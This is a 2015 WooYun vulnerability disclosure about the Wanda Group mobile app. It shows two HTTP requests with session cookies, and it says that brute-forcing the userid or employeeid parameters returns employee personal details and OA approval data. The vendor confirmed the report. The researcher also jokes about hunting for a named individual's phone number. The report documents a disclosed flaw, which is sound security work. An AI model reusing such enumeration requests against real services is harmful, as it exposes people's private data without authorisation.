当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150361

漏洞标题:大连万达集团APP设计缺陷可再次遍历员工个人信息和部分办公信息

相关厂商:大连万达集团股份有限公司

漏洞作者: 高小厨

提交时间:2015-10-29 20:33

修复时间:2015-12-13 21:12

公开时间:2015-12-13 21:12

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-29: 厂商已经确认,细节仅向厂商公开
2015-11-08: 细节向核心白帽子及相关领域专家公开
2015-11-18: 细节向普通白帽子公开
2015-11-28: 细节向实习白帽子公开
2015-12-13: 细节向公众公开

简要描述:

月末了,来wooyun报道
然后才想起来还有一个贵司的VPN没有发乌云,然后今天发现用不了了。。。

详细说明:

1.还是那个“万达集团”APP
2.两个接口,获取员工个人信息,爆破userid就行了

GET http://app.wanda.cn/wanda3v/user/userinfo.html?userid=wangyang HTTP/1.1
Host: app.wanda.cn
Connection: close
Accept-Encoding: gzip
User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)
Connection: close
Cookie: jsessionid|JSESSIONID=6c1fd8e773545ae579fcacc22a7c22df


3.获取员工OA部分信息

GET http://app.wanda.cn/wanda3v/oaapprove/oaapprovelist.html?type=1&resolution=960*640&vid=2a51f71011fc448cb186eb1958b0ec55&devid=7c7db2d9ec0c17619d0671d1088b21e22a3aa7c9&employeeid=wanglei0&sysversion=8.4&devicetype=0&num=20&start=1&datetime=1446097677&devtype=0&systype=iPhone%20OS&phonemodel=Unknown%20iPad&appname=ctx&appversion=3.0 HTTP/1.1
Host: app.wanda.cn
Connection: close
Accept-Encoding: gzip
User-Agent: 万达集团 3.0 rv:6612 (iPad; iPhone OS 8.4; zh_CN)
Connection: close
Cookie: jsessionid|JSESSIONID=4428f07da5ab0bc877967df8bf788dce


漏洞证明:

个人信息:

1.png

2.png

3.png


OA信息:

5.png

6.png

7.png

修复方案:

哎~~~还是没找到聪个电话号

版权声明:转载请注明来源 高小厨@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-29 21:10

厂商回复:

感谢高小厨同学的关注与贡献!马上通知业务整改!另外,不用再试图找王思聪先生的联系方式了,因为我们也找不到。

最新状态:

暂无